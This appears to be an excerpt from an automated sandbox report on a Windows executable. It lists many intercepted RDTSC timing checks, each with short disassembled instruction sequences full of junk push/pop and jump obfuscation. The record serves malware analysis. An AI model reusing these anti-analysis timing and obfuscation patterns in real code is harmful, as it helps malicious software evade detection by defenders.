                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7506F second address: C7507F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC41CDAB668h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7977F second address: C79783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79783 second address: C7978F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FC41CDAB666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C011C7 second address: C011DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC41CC2F0C8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48089 second address: C4808D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4808D second address: C48093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48093 second address: C4809D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC41CDAB666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4809D second address: C480BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0D2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C480BA second address: C480BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C480BF second address: C48127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 movzx ecx, ax 0x0000000b lea eax, dword ptr [ebp+1247DE5Ch] 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FC41CC2F0C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b call 00007FC41CC2F0D6h 0x00000030 clc 0x00000031 pop edi 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC41CC2F0D9h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48127 second address: C4812C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4812C second address: C28147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jno 00007FC41CC2F0D4h 0x00000010 nop 0x00000011 sub dword ptr [ebp+12475220h], eax 0x00000017 call dword ptr [ebp+122D1ADBh] 0x0000001d push ecx 0x0000001e jg 00007FC41CC2F0C8h 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007FC41CC2F0D4h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48696 second address: C486A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC41CDAB666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C486A0 second address: C486E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007FC41CC2F0EBh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC41CC2F0D9h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4885C second address: C488B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 xchg eax, esi 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FC41CDAB668h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 sub dword ptr [ebp+1244A67Fh], eax 0x00000029 call 00007FC41CDAB679h 0x0000002e mov dx, bx 0x00000031 pop edx 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C489AC second address: C489B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C489B0 second address: C489F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC41CDAB678h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC41CDAB676h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C489F9 second address: C48A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48A16 second address: C48A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48B0C second address: C48B20 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48B20 second address: C48B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CDAB66Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4945E second address: C49493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d jng 00007FC41CC2F0C8h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC41CC2F0D9h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49545 second address: C495AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c jmp 00007FC41CDAB66Eh 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FC41CDAB668h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov di, si 0x00000031 lea eax, dword ptr [ebp+1247DEA0h] 0x00000037 movzx edi, cx 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007FC41CDAB66Fh 0x00000041 pushad 0x00000042 jp 00007FC41CDAB666h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78E99 second address: C78EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC41CC2F0CFh 0x0000000d jng 00007FC41CC2F0C6h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79158 second address: C79165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007FC41CDAB66Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79165 second address: C7916C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7916C second address: C79189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jnc 00007FC41CDAB672h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79189 second address: C7918D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7918D second address: C79191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79191 second address: C79197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28C7B second address: C28C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28C81 second address: C28C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28C85 second address: C28C8F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CDAB666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79320 second address: C79340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D2h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FC41CC2F0C8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79340 second address: C79347 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C886 second address: C7C8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0D7h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC41CC2F0D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8B7 second address: C7C8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41CDAB666h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CDAB671h 0x00000013 jno 00007FC41CDAB66Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8E0 second address: C7C8E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8E8 second address: C7C8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8EC second address: C7C8F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8F0 second address: C7C8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81559 second address: C81587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0D0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC41CC2F0D7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81587 second address: C8158F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8158F second address: C81599 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41CC2F0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81599 second address: C815A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8188B second address: C818AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC41CC2F0D2h 0x0000000a jne 00007FC41CC2F0CEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81BD4 second address: C81BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81E8D second address: C81EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jns 00007FC41CC2F0C6h 0x0000000f jns 00007FC41CC2F0C6h 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81EA3 second address: C81EA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81EA8 second address: C81EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82014 second address: C8201A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82349 second address: C82374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FC41CC2F0C6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82374 second address: C8237A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8237A second address: C82387 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007FC41CC2F0C6h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C824EE second address: C824F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0626C second address: C06270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06270 second address: C0628E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CDAB666h 0x00000008 jbe 00007FC41CDAB666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007FC41CDAB66Eh 0x00000016 jns 00007FC41CDAB666h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0628E second address: C06296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06296 second address: C0629A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0629A second address: C062AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C062AE second address: C062CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC41CDAB66Eh 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C062CB second address: C062D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC41CC2F0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8AE9A second address: C8AEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007FC41CDAB66Eh 0x0000000b jmp 00007FC41CDAB66Dh 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C89F25 second address: C89F2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8992B second address: C8992F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A628 second address: C8A64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC41CC2F0C6h 0x0000000a jmp 00007FC41CC2F0D9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A64B second address: C8A653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A653 second address: C8A657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A8B0 second address: C8A8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FC41CDAB666h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A8C1 second address: C8A8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8AB9F second address: C8ABD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC41CDAB671h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FC41CDAB666h 0x00000012 popad 0x00000013 pushad 0x00000014 jns 00007FC41CDAB666h 0x0000001a jno 00007FC41CDAB666h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jno 00007FC41CDAB666h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8ABD7 second address: C8ABDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E7B6 second address: C8E7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E7BC second address: C8E7C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E7C4 second address: C8E7CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E1D2 second address: C8E1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E1D9 second address: C8E1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E1E1 second address: C8E205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007FC41CC2F0E6h 0x0000000d jmp 00007FC41CC2F0D4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E337 second address: C8E351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC41CDAB673h 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9055A second address: C9055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9055E second address: C9056F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9056F second address: C9057D instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BEEC second address: C9BEF6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CDAB684h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C18E second address: C9C196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C196 second address: C9C19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C19B second address: C9C1A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CC2F0CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C1A7 second address: C9C1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007FC41CDAB675h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C1C5 second address: C9C1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C448 second address: C9C488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41C7769E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007FC41C7769D6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jnc 00007FC41C7769D6h 0x0000001e jo 00007FC41C7769D6h 0x00000024 jmp 00007FC41C7769E0h 0x00000029 popad 0x0000002a rdtsc
